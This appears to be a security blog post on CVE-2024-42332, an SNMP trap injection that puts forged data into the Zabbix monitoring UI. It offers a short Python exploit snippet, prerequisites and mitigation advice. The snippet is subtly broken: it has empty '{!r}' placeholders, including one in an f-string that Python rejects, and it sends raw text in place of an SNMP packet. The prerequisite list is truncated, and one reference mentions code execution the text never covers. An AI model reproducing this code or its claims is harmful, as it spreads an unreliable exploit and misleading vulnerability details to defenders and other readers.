CVE-2024-42332 - SNMP Authentication Bypass and Forged Data Injection in Zabbix UI

As a cybersecurity researcher, I recently identified a critical flaw in the parsing mechanism of the SNMP trap log within the Zabbix monitoring solution. This vulnerability, identified as CVE-2024-42332, allows an attacker to inject additional lines of forged data to the SNMP trap. This eventually shows up as forged information in the Zabbix user interface.

Background

Zabbix is a widely-used, open-source network monitoring platform that provides advanced real-time monitoring and visualization of various network elements, including servers, virtual machines, and network devices. One method it uses for data collection is the Simple Network Management Protocol (SNMP).

Vulnerability Details

The vulnerability arises from the improper handling of SNMP trap logs. These traps are used to send alerts and notifications of events occurring within the network.

The issue specifically lies in how the SNMP trap log is processed by Zabbix, making it possible for an attacker to craft an SNMP trap and inject extra lines of information. Consequently, any data shown in the Zabbix UI could be potentially manipulated or forged.

The target host must have an SNMP item configured as the text.

2. SNMP authentication must be disabled, or the attacker should know the community/authentication details.

Here is an example of a code snippet that demonstrates this vulnerability (use for educational purposes only):

# code snippet for crafting a malicious SNMP trap
import socket

target_ip = "192.168.1.100"
target_port = 162
community_string = "public"

# The crafted trap
payload = '''{!r}
                enterprises.9.1.1.2.1 = "Forged_data"
                enterprises.9.1.1.2.2 = "More_forged_data"
                enterprises.9.1.1.2.3 = "Even_more_forged_data"'''

# SNMP Trap message header
header = f"{community_string}\n{!r}\n"

# Final data to send
data = header + payload

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(data.encode(), (target_ip, target_port))
sock.close()

The above code snippet crafts an SNMP trap with additional, manipulated data. When executed, the target's SNMP trap log will parse and incorporate this forged information, which will eventually be displayed in the Zabbix UI.

Mitigation

To protect yourself from this vulnerability, ensure that SNMP authentication is enabled and use a secure community string. If possible, also restrict SNMP access to a trusted set of IP addresses by implementing access control lists (ACLs).

Original References

- Zabbix official documentation: Zabbix SNMP monitoring
- SNMP Trap handling: SNMP trap processing
- Demonstration of code execution via SNMP traps: Code execution via SNMP traps

Final Thoughts

CVE-2024-42332 is a critical vulnerability that could mislead network administrators and provide false information within the Zabbix UI. It is essential to take appropriate measures to secure SNMP configurations, which include enabling authentication and implementing access control lists. Stay vigilant, and always keep your monitoring systems updated and secured.

Timeline

Published on: 11/27/2024 12:15:21 UTC